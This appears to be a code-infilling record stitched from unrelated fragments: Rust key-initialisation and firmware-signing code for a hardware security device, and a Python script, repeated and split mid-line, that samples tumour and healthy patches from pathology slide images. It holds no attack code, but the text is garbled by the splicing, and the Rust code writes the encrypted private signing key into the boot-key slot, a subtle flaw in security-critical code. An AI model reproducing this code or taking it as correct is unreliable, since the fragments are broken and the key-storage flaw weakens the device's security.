pub fn set_ux_password_type(&mut self, cur_type: Option<PasswordType>) {
self.cur_password_type = cur_type;
}
/// Called by the UX layer to check which password request is in progress
pub fn get_ux_password_type(&self) -> Option<PasswordType> {self.cur_password_type}
pub fn is_initialized(&mut self) -> bool {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
if config & keyrom_config::INITIALIZED.ms(1) != 0 {
true
} else {
false
}
}
/// Called by the UX layer to set up a key init run. It disables suspend/resume for the duration
/// of the run, and also sets up some missing fields of KEYROM necessary to encrypt passwords.
pub fn setup_key_init(&mut self) {
// block suspend/resume ops during security-sensitive operations
self.susres.set_suspendable(false).expect("couldn't block suspend/resume");
// in this block, keyrom data is copied into RAM.
// make a copy of the KEYROM to hold the new mods, in the sensitive data area
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for addr in 0..256 {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, addr);
sensitive_slice[addr as usize] = self.keyrom.rf(utra::keyrom::DATA_DATA);
}
// provision the pepper
for keyword in sensitive_slice[KeyRomLocs::PEPPER as usize..KeyRomLocs::PEPPER as usize + 128/(size_of::<u32>()*8)].iter_mut() {
*keyword = self.trng.get_u32().expect("couldn't get random number");
}
}
/// Core of the key initialization routine. Requires a `progress_modal` dialog box that has been set
/// up with the appropriate notification messages by the UX layer, and a `Slider` type action which
/// is used to report the progress of the initialization routine. We assume the `Slider` box is set
/// up to report progress on a range of 0-100%.
///
/// This routine dispatches the following activities:
/// - generate signing private key (encrypted with update password)
/// - generate rootkey (encrypted with boot password)
/// - generate signing public key
/// - set the init bit
/// - sign the loader
/// - sign the kernel
/// - compute the patch set for the FPGA bitstream
/// - do the patch (whatever that means - gotta deal with the AES key, HMAC etc.)
/// - verify the FPGA image hmac
/// - sign the FPGA image
/// - get ready for a reboot
/// - returns true if we should reboot (everything succeeded)
/// - returns false if we had an error condition (don't reboot)
pub fn do_key_init(&mut self, progress_modal: &mut Modal, progress_action: &mut Slider) -> bool {
// kick the progress bar to indicate we've entered the routine
update_progress(1, progress_modal, progress_action);
let keypair: Keypair = Keypair::generate(&mut self.trng);
// pub key is easy, no need to encrypt
let public_key: [u8; ed25519_dalek::PUBLIC_KEY_LENGTH] = keypair.public.to_bytes();
{ // scope sensitive_slice narrowly, as it borrows *self mutably, and can mess up later calls that borrow an immutable self
// sensitive_slice is our staging area for the new keyrom contents
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in public_key.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PUBKEY as usize..KeyRomLocs::SELFSIGN_PUBKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
// extract the update password key from the cache, and apply it to the private key
let pcache: &PasswordCache = unsafe{&*(self.pass_cache.as_mut_ptr() as *mut PasswordCache)};
#[cfg(feature = "hazardous-debug")]
{
log::info!("cached boot passwords {:x?}", pcache.hashed_boot_pw);
log::info!("cached update password: {:x?}", pcache.hashed_update_pw);
}
// private key must XOR with password before storing
let mut private_key_enc: [u8; ed25519_dalek::SECRET_KEY_LENGTH] = [0; ed25519_dalek::SECRET_KEY_LENGTH];
// we do this from to try and avoid making as few copies of the hashed password as possible
for (dst, (plain, key)) in
private_key_enc.iter_mut()
.zip(keypair.secret.to_bytes().iter()
.zip(pcache.hashed_update_pw.iter())) {
*dst = plain ^ key;
}
// store the private key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in private_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::SELFSIGN_PRIVKEY as usize..KeyRomLocs::SELFSIGN_PRIVKEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
update_progress(10, progress_modal, progress_action);
// generate and store a root key (aka boot key), this is what is unlocked by the "boot password"
// ironically, it's a "lower security" key because it just acts as a gatekeeper to further
// keys that would have a stronger password applied to them, based upon the importance of the secret
// think of this more as a user PIN login confirmation, than as a significant cryptographic event
let mut boot_key_enc: [u8; 32] = [0; 32];
for (dst, key) in
boot_key_enc.chunks_mut(4).into_iter()
.zip(pcache.hashed_boot_pw.chunks(4).into_iter()) {
let key_word = self.trng.get_u32().unwrap().to_be_bytes();
// just unroll this loop, it's fast and easy enough
(*dst)[0] = key[0] ^ key_word[0];
(*dst)[1] = key[1] ^ key_word[1];
(*dst)[2] = key[2] ^ key_word[2];
(*dst)[3] = key[3] ^ key_word[3];
// also note that interestingly, we don't have to XOR it with the hashed boot password --
// this key isn't used by this routine, just initialized, so really, it only matters to
// XOR it with the password when you use it the first time to encrypt something.
}
// store the boot key to the keyrom staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (src, dst) in private_key_enc.chunks(4).into_iter()
.zip(sensitive_slice[KeyRomLocs::USER_KEY as usize..KeyRomLocs::USER_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()) {
*dst = u32::from_be_bytes(src.try_into().unwrap())
}
}
update_progress(20, progress_modal, progress_action);
// sign the loader
let (loader_sig, loader_len) = self.sign_loader(&keypair);
update_progress(30, progress_modal, progress_action);
// sign the kernel
let (kernel_sig, kernel_len) = self.sign_kernel(&keypair);
update_progress(40, progress_modal, progress_action);
// encrypt the FPGA key using the update password. in an un-init system, it is provided to us in plaintext format
// e.g. in the case that we're doing a BBRAM boot (eFuse flow would give us a 0's key and we'd later on set it)
#[cfg(feature = "hazardous-debug")]
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key before encryption: ");
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
for (word, key_word) in sensitive_slice[KeyRomLocs::FPGA_KEY as usize..KeyRomLocs::FPGA_KEY as usize + 256/(size_of::<u32>()*8)].iter_mut()
.zip(pcache.hashed_update_pw.chunks(4).into_iter()) {
*word = *word ^ u32::from_be_bytes(key_word.try_into().unwrap());
}
}
update_progress(50, progress_modal, progress_action);
// set the "init" bit in the staging area
{
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, KeyRomLocs::CONFIG as u32);
let config = self.keyrom.rf(utra::keyrom::DATA_DATA);
sensitive_slice[KeyRomLocs::CONFIG as usize] |= keyrom_config::INITIALIZED.ms(1);
}
update_progress(60, progress_modal, progress_action);
#[cfg(feature = "hazardous-debug")]
{
log::info!("Self private key: {:x?}", keypair.secret.to_bytes());
log::info!("Self public key: {:x?}", keypair.public.to_bytes());
self.debug_staging();
}
// Because we're initializing keys for the *first* time, make a backup copy of the bitstream to
// the staging area. Note that if we're doing an update, the update target would already be
// in the staging area, so this step should be skipped.
self.make_gateware_backup(60, 70, progress_modal, progress_action);
// compute the keyrom patch set for the bitstream
// at this point the KEYROM as replicated in sensitive_slice should have all its assets in place
patch::should_patch(42);
// finalize the progress bar on exit -- always leave at 100%
update_progress(100, progress_modal, progress_action);
true
}
fn make_gateware_backup(&mut self, prog_start: u32, prog_end: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
// println!("this is a test of stdlib");
}
#[cfg(feature = "hazardous-debug")]
fn debug_staging(&self) {
self.debug_print_key(KeyRomLocs::FPGA_KEY as usize, 256, "FPGA key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PRIVKEY as usize, 256, "Self private key: ");
self.debug_print_key(KeyRomLocs::SELFSIGN_PUBKEY as usize, 256, "Self public key: ");
self.debug_print_key(KeyRomLocs::DEVELOPER_PUBKEY as usize, 256, "Dev public key: ");
self.debug_print_key(KeyRomLocs::THIRDPARTY_PUBKEY as usize, 256, "3rd party public key: ");
self.debug_print_key(KeyRomLocs::USER_KEY as usize, 256, "Boot key: ");
self.debug_print_key(KeyRomLocs::PEPPER as usize, 128, "Pepper: ");
self.debug_print_key(KeyRomLocs::CONFIG as usize, 32, "Config (as BE): ");
}
#[cfg(feature = "hazardous-debug")]
fn debug_print_key(&self, offset: usize, num_bits: usize, name: &str) {
use core::fmt::Write;
let mut debugstr = xous_ipc::String::<4096>::new();
let sensitive_slice = self.sensitive_data.as_slice::<u32>();
write!(debugstr, "{}", name).unwrap();
for word in sensitive_slice[offset .. offset as usize + num_bits/(size_of::<u32>()*8)].iter() {
for byte in word.to_be_bytes().iter() {
write!(debugstr, "{:02x}", byte).unwrap();
}
}
log::info!("{}", debugstr);
}
pub fn sign_loader(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let loader_len =
xous::LOADER_CODE_LEN
- SIGBLOCK_SIZE
+ graphics_server::fontmap::FONT_TOTAL_LEN as u32
+ 8; // two u32 words are appended to the end, which repeat the "version" and "length" fields encoded in the signature block
// this is a huge hash, so, get a hardware hasher, even if it means waiting for it
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let loader_region = self.loader_code.as_slice::<u8>();
// the loader data starts one page in; the first page is reserved for the signature itself
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
// now get the font plane data
self.gfx.bulk_read_restart(); // reset the bulk read pointers on the gfx side
let bulkread = BulkRead::default();
let mut buf = xous_ipc::Buffer::into_buf(bulkread).expect("couldn't transform bulkread into aligned buffer");
// this form of loop was chosen to avoid the multiple re-initializations and copies that would be entailed
// in our usual idiom for pasing buffers around. instead, we create a single buffer, and re-use it for
// every iteration of the loop.
loop {
buf.lend_mut(self.gfx.conn(), self.gfx.bulk_read_fontmap_op()).expect("couldn't do bulkread from gfx");
let br = buf.as_flat::<BulkRead, _>().unwrap();
hasher.update(&br.buf[..br.len as usize]);
if br.len != bulkread.buf.len() as u32 {
log::trace!("non-full block len: {}", br.len);
}
if br.len < bulkread.buf.len() as u32 {
// read until we get a buffer that's not fully filled
break;
}
}
if false { // this path is for debugging the loader hash. It spoils the loader signature in the process.
let digest = hasher.finalize();
log::info!("len: {}", loader_len);
log::info!("{:x?}", digest);
// fake hasher for now
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
hasher.update(&loader_region[SIGBLOCK_SIZE as usize..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
} else {
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the loader"), loader_len)
}
}
pub fn sign_kernel(&mut self, signing_key: &Keypair) -> (Signature, u32) {
let mut hasher = engine_sha512::Sha512::new(Some(engine_sha512::FallbackStrategy::WaitForHardware));
let kernel_region = self.kernel.as_slice::<u8>();
// for the kernel length, we can't know/trust the given length in the signature field, so we sign the entire
// length of the region. This will increase the time it takes to verify; however, at the current trend, we'll probably
// use most of the available space for the kernel, so by the time we're done maybe only 10-20% of the space is empty.
let kernel_len = kernel_region.len() - SIGBLOCK_SIZE as usize;
hasher.update(&kernel_region[SIGBLOCK_SIZE as usize ..]);
(signing_key.sign_prehashed(hasher, None).expect("couldn't sign the kernel"), kernel_len as u32)
}
/// Called by the UX layer at the epilogue of the initialization run. Allows suspend/resume to resume,
/// and zero-izes any sensitive data that was created in the process.
pub fn finish_key_init(&mut self) {
let sensitive_slice = self.sensitive_data.as_slice_mut::<u32>();
// zeroize the RAM-backed data
for data in sensitive_slice.iter_mut() {
*data = 0;
}
// re-allow suspend/resume ops
self.susres.set_suspendable(true).expect("couldn't re-allow suspend/resume");
}
}
fn update_progress(new_state: u32, progress_modal: &mut Modal, progress_action: &mut Slider) {
log::info!("progress: {}", new_state);
progress_action.set_state(new_state);
progress_modal.modify(
Some(gam::modal::ActionType::Slider(*progress_action)),
None, false, None, false, None);
progress_modal.redraw(); // stage the modal box pixels to the back buffer
progress_modal.gam.redraw().expect("couldn't cause back buffer to be sent to the screen");
xous::yield_slice(); // this gives time for the GAM to do the sending
}
| {
let mut key: [u8; 32] = [0; 32];
for (addr, word) in key.chunks_mut(4).into_iter().enumerate() {
self.keyrom.wfo(utra::keyrom::ADDRESS_ADDRESS, index as u32 + addr as u32);
let keyword = self.keyrom.rf(utra::keyrom::DATA_DATA);
for (&byte, dst) in keyword.to_be_bytes().iter().zip(word.iter_mut()) {
*dst = byte;
}
}
key
} | identifier_body |
extract_patches2.py | """这里把slide read的时候的dimention换成了mask的dimention,为了防止大小不一样"""
from openslide import open_slide, __library_version__ as openslide_lib_version, __version__ as openslide_version
import numpy as np
import random, os, glob, time
import matplotlib.pyplot as plt
from matplotlib.colors import Normalize
from skimage.color import rgb2hsv
import pandas as pd
#from save_npy import get_arg
'''
args = get_arg()
# set levels: 0 to 7 (greater than 4 not recommended)
lev1 = args.lev1
lev2 = args.lev2
# set patch sizes (I don't recomment changing that, although making it smaller
# will decrease run time)
patch_size = args.patch_size
patch_centre = args.patch_centre
my_pre_process = 'rescale_' + str(lev1) + '-' + str(lev2)
# choose conv base: 'Inception' or 'my-conv-base'
my_conv_base = args.my_conv_base
model_name = 'multi-input_' + my_conv_base + '_lev' + str(lev1) + str(lev2)
is_trainval_test = args.is_trainval_test
tif_folder = args.tif_folder
mask_folder = args.mask_folder
save_folder = args.save_folder
num_per_img = args.num_per_img
num_random_sample = args.num_random_sample
'''
# =======================Collect train/val and test patches=======================
# functions provided by Joshua Gordon
# See https://openslide.org/api/python/#openslide.OpenSlide.read_region
# Note: x,y coords are with respect to level 0.
def read_slide(slide, x, y, level, width, height, as_float=False):
""" Read a region from the slide
Return a numpy RBG array
"""
im = slide.read_region((x, y), level, (width, height))
im = im.convert('RGB') # drop the alpha channel
if as_float:
im = np.asarray(im, dtype=np.float32)
else:
im = np.asarray(im)
assert im.shape == (height, width, 3) # 3:rgb
return im
'''
def find_tissue_pixels(image, intensity=0.8):
""" Return tissue pixels for an image
"""
im_gray = rgb2gray(image)
assert im_gray.shape == (image.shape[0], image.shape[1])
indices = np.where(im_gray <= intensity) # 返回满足条件的坐标,第一个数组是第一维度的坐标,第二个2
return zip(indices[0], indices[1])
'''
def find_tissue_pixels(image):
""" Return tissue pixels for an image
"""
img_RGB = np.array(image)
img_HSV = rgb2hsv(img_RGB)
background_R = img_RGB[:, :, 0] > 203
background_G = img_RGB[:, :, 1] > 191
background_B = img_RGB[:, :, 2] > 201
tissue_RGB = np.logical_not(background_R & background_G & background_B)
tissue_S = img_HSV[:, :, 1] > 0.1113
'''如果仅使用用threadshold,中间会有部份白色脂肪区域被隔离'''
rgb_min = 50
min_R = img_RGB[:, :, 0] > rgb_min
min_G = img_RGB[:, :, 1] > rgb_min
min_B = img_RGB[:, :, 2] > rgb_min
tissue_mask = tissue_S & tissue_RGB & min_R & min_G & min_B
indices = np.where(tissue_mask == 1)
return zip(indices[0], indices[1])
def apply_mask(im, mask, color=(1, 0, 0)):
""" Return the mask as an image
"""
masked = np.zeros(im.shape)
for x, y in mask: masked[x][y] = color
return masked
def get_patches(slide, tumor_mask, lev, x0, y0, patch_size):
""" Get patches from a slide: RBG image, tumor mask, tissue mask CENTERED at x0, y0
imputs:
- slide: OpenSlide object for RGB slide images
- tumor_mask: OpenSlide object for tumor masks
- lev: int, target zoom level for the patches, between 0 and 7
- x0, y0: int, pixel coordinates at level 0
- patch_size: int, usually 299
outputs:
- patch_image: array, RBG image
- patch_mask: array, tumor mask
- patch_tissue: array, tissue mask
"""
# calc downsample factor
downsample_factor = 2 ** lev
# calc new x and y so that the patch is CENTER at the input x and y
new_x = x0 - (patch_size // 2) * downsample_factor
new_y = y0 - (patch_size // 2) * downsample_factor
# read RGB patch
patch_image = read_slide(slide,
x=new_x,
y=new_y,
level=lev,
width=patch_size,
height=patch_size)
# read tumor mask
patch_mask = read_slide(tumor_mask,
x=new_x,
y=new_y,
level=lev,
width=patch_size,
height=patch_size)
# 1 channel is enough for the mask
patch_mask = patch_mask[:, :, 0]
# make tissue mask
tissue_pixels = find_tissue_pixels(patch_image)
patch_tissue = apply_mask(patch_image, tissue_pixels)
return patch_image, patch_mask, patch_tissue
def check_patch_centre(patch_mask, patch_centre):
""" Check if there is any tumor pixel in the 128x128 centre
inputs:
- patch_mask: array, tumor mask
- patch_centre: int, usually 1 | with labels from the slides in the list
inputs:
- tif: tif
- mask: mask
- lev1: int, target zoom level for the patches, between 0 and 7 - higher resolution: lev1<lev2
- lev2: int, target zoom level for the patches, between 0 and 7 - lower resolution
- num_per_imgm: int, number of patches to extract per slide per class, usually 100
- patch_size: int, usually 299
- patch_centre: int, usually 128
save_folder: save csv file path.
outputs:
- patch_images: list, extracted patches as arrays
- patch_labels: list, labels of patches: 0 - healthy, 1 - tumor
- save a plot of the patches
"""
table=pd.DataFrame(columns=['slide_name','x','y','label'])
# init output lists
patch_images_lev1 = []
patch_images_lev2 = []
patch_labels = []
num_cancer = 0
num_health = 0
# file paths
slide_path = tif
mask_path = mask
f_num = slide_path.split('/')[-1].split('.')[0]
slide_name=os.path.basename(slide_path).rstrip('.tif')
# get images with OpenSlide
slide = open_slide(slide_path)
tumor_mask = open_slide(mask_path)
# read level 4 slide image and mask - for the purposes of getting healthy
# and tumor pixels
# 读取slide和mask,read_slide就是返回一shape == (height, width, 3) #3:rgb
slide_image = read_slide(slide,
x=0,
y=0,
level=4,
width=tumor_mask.level_dimensions[4][0],
height=tumor_mask.level_dimensions[4][1])
mask_image = read_slide(tumor_mask,
x=0,
y=0,
level=4,
width=tumor_mask.level_dimensions[4][0],
height=tumor_mask.level_dimensions[4][1])
print('--------checking mask image shape after read slide', mask_image.shape)
print('--------checking slide_image shape after read slide', slide_image.shape)
mask_image = mask_image[:, :, 0]
# print ('--------checking mask image shape after mask_image[:, :, 0]', mask_image.siz)
# get a list of tumor pixels at level 4
mask_lev_4_cancer = np.nonzero(mask_image)
# print ('checking length of mask_lev_4_cancer', mask_lev_4_cancer)
# make a healthy tissue mask by subtracting tumor mask from tissue mask
tissue_pixels = find_tissue_pixels(slide_image)
# print ('---checking tissue_pixels ', tissue_pixels )
tissue_regions = apply_mask(slide_image, tissue_pixels)
# print ('------checking tissue_regions', tissue_regions)
mask_health = tissue_regions[:, :, 0] - mask_image
# print ('------checking mask_health = tissue_regions[:, :, 0] - mask_image-------', mask_health.shape)
mask_health = mask_health > 0
# print ('------checking mask_health = mask_health > 0---------', mask_health.shape)
mask_health = mask_health.astype('int')
# print ('------checking mask_health = mask_health.astypeint-------', mask_health.shape)
# get a list of healthy pixels at level 4
mask_lev_4_health = np.nonzero(mask_health)
# print ('------checking mask_lev_4_health----', len(mask_lev_4_health[0]))
# print()
# print('lenmask_lev_4_cancerpatch_size ** 2, lenmask_lev_4_health0patch_size ** 2:',
# len(mask_lev_4_cancer[0]) // (patch_size ** 2), len(mask_lev_4_health[0]) // (patch_size ** 2))
# -------------------------------------------------------------
if len(mask_lev_4_cancer[0]) != 0:
print('extracting tumor patches------')
#logging.info('extracting tumor patches')
# extract TUMOR patches
# get a random sample of tumor pixels
# Note: did random.sample here rather than random.choice inside the while loop because os speed
random_sample = min(len(list(zip(mask_lev_4_cancer[1], mask_lev_4_cancer[0])))-1,num_random_sample)
sample_cancer = random.sample(list(zip(mask_lev_4_cancer[1], mask_lev_4_cancer[0])), random_sample)
c = 0
idx= 0
# continue until enough patches extracted
while num_cancer < num_per_img:
c += 1
if c == random_sample:
break
# print('-----checking-------c', c)
# if c % 10 == 0:
# print(c, end=', ')
# get the next pixel from the sample - coordinates at level4
(x4, y4) = sample_cancer[c]
# convert level 4 coordinates to level 0
x0 = x4 * (2 ** 4)
y0 = y4 * (2 ** 4)
# extract patches at lev1 CENTERED at that pixel
patch_image_lev1, patch_mask_lev1, patch_tissue_lev1 = \
get_patches(slide, tumor_mask, lev1, x0, y0, patch_size)
# calc tissue ratio in that patch
tissue_ratio = np.sum(patch_tissue_lev1[:, :, 0]) / (patch_size ** 2)
# double-check if the patch has tumor
has_cancer = check_patch_centre(patch_mask_lev1, patch_centre)
# if it has more than 50% tissue and has tumor
if (tissue_ratio > 0.5) & has_cancer:
# collect lev1 patch
num_cancer += 1
table.loc[idx]=(slide_name,x0,y0,1)
idx+=1
# -------------------------------------------------------------
# extract HEALTHY patches
# repeat the above for the healthy pixels
print('extracting normal patches------')
#logging.info('extracting normal patches')
# print()
# get a random sample of healthy pixels
random_sample = min(len(list(zip(mask_lev_4_health[1], mask_lev_4_health[0])))-1, num_random_sample)
sample_health = random.sample(list(zip(mask_lev_4_health[1], mask_lev_4_health[0])), random_sample)
# print('-------checking sample_health------', len(sample_health))
c = 0
# get healthy images
while num_health < num_per_img:
c += 1
if c == random_sample:
break
# if c % 10 == 0:
# print(c, end=', ')
# get the next pixel from the sample - coordinates at level 4
(x4, y4) = sample_health[c]
# convert level 4 coordinates to level 0
x0 = x4 * (2 ** 4)
y0 = y4 * (2 ** 4)
# extract patches at lev1 CENTERED at that pixel
patch_image_lev1, patch_mask_lev1, patch_tissue_lev1 = \
get_patches(slide, tumor_mask, lev1, x0, y0, patch_size)
# calc tissue ratio in that patch
tissue_ratio = np.sum(patch_tissue_lev1[:, :, 0]) / (patch_size ** 2)
# check if the patch has tumor
has_cancer = check_patch_centre(patch_mask_lev1, patch_centre)
# if it has more than 50% tissue and doens't have tumor in the 128x128 centre
if (tissue_ratio > 0.5) & (not has_cancer):
# collect lev1 patch
num_health += 1
table.loc[idx]=(slide_name,x0,y0,0)
idx+=1
table.to_csv(save_folder,header=True)
return table
| 28
outputs: Boolean
"""
# get patch size
patch_size = patch_mask.shape[0]
# get the offset to check the 128x128 centre
offset = int((patch_size - patch_centre) / 2)
# sum the pixels in the 128x128 centre for the tumor mask
sum_cancers = np.sum(patch_mask[offset:offset + patch_centre, offset:offset + patch_centre])
return sum_cancers > 0
def collect_patches(tif, mask, lev1, lev2, num_per_img, patch_size, patch_centre, save_folder, num_random_sample):
""" Extract patches | identifier_body |
extract_patches2.py | """这里把slide read的时候的dimention换成了mask的dimention,为了防止大小不一样"""
from openslide import open_slide, __library_version__ as openslide_lib_version, __version__ as openslide_version
import numpy as np
import random, os, glob, time
import matplotlib.pyplot as plt
from matplotlib.colors import Normalize
from skimage.color import rgb2hsv
import pandas as pd
#from save_npy import get_arg
'''
args = get_arg()
# set levels: 0 to 7 (greater than 4 not recommended)
lev1 = args.lev1
lev2 = args.lev2
# set patch sizes (I don't recomment changing that, although making it smaller
# will decrease run time)
patch_size = args.patch_size
patch_centre = args.patch_centre
my_pre_process = 'rescale_' + str(lev1) + '-' + str(lev2)
# choose conv base: 'Inception' or 'my-conv-base'
my_conv_base = args.my_conv_base
model_name = 'multi-input_' + my_conv_base + '_lev' + str(lev1) + str(lev2)
is_trainval_test = args.is_trainval_test
tif_folder = args.tif_folder
mask_folder = args.mask_folder
save_folder = args.save_folder
num_per_img = args.num_per_img
num_random_sample = args.num_random_sample
'''
# =======================Collect train/val and test patches=======================
# functions provided by Joshua Gordon
# See https://openslide.org/api/python/#openslide.OpenSlide.read_region
# Note: x,y coords are with respect to level 0.
def read_slide(slide, x, y, level, width, height, as_float=False):
""" Read a region from the slide
Return a numpy RBG array
"""
im = slide.read_region((x, y), level, (width, height))
im = im.convert('RGB') # drop the alpha channel
if as_float:
im = np.asarray(im, dtype=np.float32)
else:
im = np.asarray(im)
assert im.shape == (height, width, 3) # 3:rgb
return im
'''
def find_tissue_pixels(image, intensity=0.8):
""" Return tissue pixels for an image
"""
im_gray = rgb2gray(image)
assert im_gray.shape == (image.shape[0], image.shape[1])
indices = np.where(im_gray <= intensity) # 返回满足条件的坐标,第一个数组是第一维度的坐标,第二个2
return zip(indices[0], indices[1])
'''
def find_tissue_pixels(image):
""" Return tissue pixels for an image
"""
img_RGB = np.array(image)
img_HSV = rgb2hsv(img_RGB)
background_R = img_RGB[:, :, 0] > 203
background_G = img_RGB[:, :, 1] > 191
background_B = img_RGB[:, :, 2] > 201
tissue_RGB = np.logical_not(background_R & background_G & background_B)
tissue_S = img_HSV[:, :, 1] > 0.1113
'''如果仅使用用threadshold,中间会有部份白色脂肪区域被隔离'''
rgb_min = 50
min_R = img_RGB[:, :, 0] > rgb_min
min_G = img_RGB[:, :, 1] > rgb_min
min_B = img_RGB[:, :, 2] > rgb_min
tissue_mask = tissue_S & tissue_RGB & min_R & min_G & min_B
indices = np.where(tissue_mask == 1)
return zip(indices[0], indices[1])
def apply_mask(im, mask, color=(1, 0, 0)):
""" Return the mask as an image
"""
masked = np.zeros(im.shape)
for x, y in mask: maske | color
return masked
def get_patches(slide, tumor_mask, lev, x0, y0, patch_size):
""" Get patches from a slide: RBG image, tumor mask, tissue mask CENTERED at x0, y0
imputs:
- slide: OpenSlide object for RGB slide images
- tumor_mask: OpenSlide object for tumor masks
- lev: int, target zoom level for the patches, between 0 and 7
- x0, y0: int, pixel coordinates at level 0
- patch_size: int, usually 299
outputs:
- patch_image: array, RBG image
- patch_mask: array, tumor mask
- patch_tissue: array, tissue mask
"""
# calc downsample factor
downsample_factor = 2 ** lev
# calc new x and y so that the patch is CENTER at the input x and y
new_x = x0 - (patch_size // 2) * downsample_factor
new_y = y0 - (patch_size // 2) * downsample_factor
# read RGB patch
patch_image = read_slide(slide,
x=new_x,
y=new_y,
level=lev,
width=patch_size,
height=patch_size)
# read tumor mask
patch_mask = read_slide(tumor_mask,
x=new_x,
y=new_y,
level=lev,
width=patch_size,
height=patch_size)
# 1 channel is enough for the mask
patch_mask = patch_mask[:, :, 0]
# make tissue mask
tissue_pixels = find_tissue_pixels(patch_image)
patch_tissue = apply_mask(patch_image, tissue_pixels)
return patch_image, patch_mask, patch_tissue
def check_patch_centre(patch_mask, patch_centre):
""" Check if there is any tumor pixel in the 128x128 centre
inputs:
- patch_mask: array, tumor mask
- patch_centre: int, usually 128
outputs: Boolean
"""
# get patch size
patch_size = patch_mask.shape[0]
# get the offset to check the 128x128 centre
offset = int((patch_size - patch_centre) / 2)
# sum the pixels in the 128x128 centre for the tumor mask
sum_cancers = np.sum(patch_mask[offset:offset + patch_centre, offset:offset + patch_centre])
return sum_cancers > 0
def collect_patches(tif, mask, lev1, lev2, num_per_img, patch_size, patch_centre, save_folder, num_random_sample):
""" Extract patches with labels from the slides in the list
inputs:
- tif: tif
- mask: mask
- lev1: int, target zoom level for the patches, between 0 and 7 - higher resolution: lev1<lev2
- lev2: int, target zoom level for the patches, between 0 and 7 - lower resolution
- num_per_imgm: int, number of patches to extract per slide per class, usually 100
- patch_size: int, usually 299
- patch_centre: int, usually 128
save_folder: save csv file path.
outputs:
- patch_images: list, extracted patches as arrays
- patch_labels: list, labels of patches: 0 - healthy, 1 - tumor
- save a plot of the patches
"""
table=pd.DataFrame(columns=['slide_name','x','y','label'])
# init output lists
patch_images_lev1 = []
patch_images_lev2 = []
patch_labels = []
num_cancer = 0
num_health = 0
# file paths
slide_path = tif
mask_path = mask
f_num = slide_path.split('/')[-1].split('.')[0]
slide_name=os.path.basename(slide_path).rstrip('.tif')
# get images with OpenSlide
slide = open_slide(slide_path)
tumor_mask = open_slide(mask_path)
# read level 4 slide image and mask - for the purposes of getting healthy
# and tumor pixels
# 读取slide和mask,read_slide就是返回一shape == (height, width, 3) #3:rgb
slide_image = read_slide(slide,
x=0,
y=0,
level=4,
width=tumor_mask.level_dimensions[4][0],
height=tumor_mask.level_dimensions[4][1])
mask_image = read_slide(tumor_mask,
x=0,
y=0,
level=4,
width=tumor_mask.level_dimensions[4][0],
height=tumor_mask.level_dimensions[4][1])
print('--------checking mask image shape after read slide', mask_image.shape)
print('--------checking slide_image shape after read slide', slide_image.shape)
mask_image = mask_image[:, :, 0]
# print ('--------checking mask image shape after mask_image[:, :, 0]', mask_image.siz)
# get a list of tumor pixels at level 4
mask_lev_4_cancer = np.nonzero(mask_image)
# print ('checking length of mask_lev_4_cancer', mask_lev_4_cancer)
# make a healthy tissue mask by subtracting tumor mask from tissue mask
tissue_pixels = find_tissue_pixels(slide_image)
# print ('---checking tissue_pixels ', tissue_pixels )
tissue_regions = apply_mask(slide_image, tissue_pixels)
# print ('------checking tissue_regions', tissue_regions)
mask_health = tissue_regions[:, :, 0] - mask_image
# print ('------checking mask_health = tissue_regions[:, :, 0] - mask_image-------', mask_health.shape)
mask_health = mask_health > 0
# print ('------checking mask_health = mask_health > 0---------', mask_health.shape)
mask_health = mask_health.astype('int')
# print ('------checking mask_health = mask_health.astypeint-------', mask_health.shape)
# get a list of healthy pixels at level 4
mask_lev_4_health = np.nonzero(mask_health)
# print ('------checking mask_lev_4_health----', len(mask_lev_4_health[0]))
# print()
# print('lenmask_lev_4_cancerpatch_size ** 2, lenmask_lev_4_health0patch_size ** 2:',
# len(mask_lev_4_cancer[0]) // (patch_size ** 2), len(mask_lev_4_health[0]) // (patch_size ** 2))
# -------------------------------------------------------------
if len(mask_lev_4_cancer[0]) != 0:
print('extracting tumor patches------')
#logging.info('extracting tumor patches')
# extract TUMOR patches
# get a random sample of tumor pixels
# Note: did random.sample here rather than random.choice inside the while loop because os speed
random_sample = min(len(list(zip(mask_lev_4_cancer[1], mask_lev_4_cancer[0])))-1,num_random_sample)
sample_cancer = random.sample(list(zip(mask_lev_4_cancer[1], mask_lev_4_cancer[0])), random_sample)
c = 0
idx= 0
# continue until enough patches extracted
while num_cancer < num_per_img:
c += 1
if c == random_sample:
break
# print('-----checking-------c', c)
# if c % 10 == 0:
# print(c, end=', ')
# get the next pixel from the sample - coordinates at level4
(x4, y4) = sample_cancer[c]
# convert level 4 coordinates to level 0
x0 = x4 * (2 ** 4)
y0 = y4 * (2 ** 4)
# extract patches at lev1 CENTERED at that pixel
patch_image_lev1, patch_mask_lev1, patch_tissue_lev1 = \
get_patches(slide, tumor_mask, lev1, x0, y0, patch_size)
# calc tissue ratio in that patch
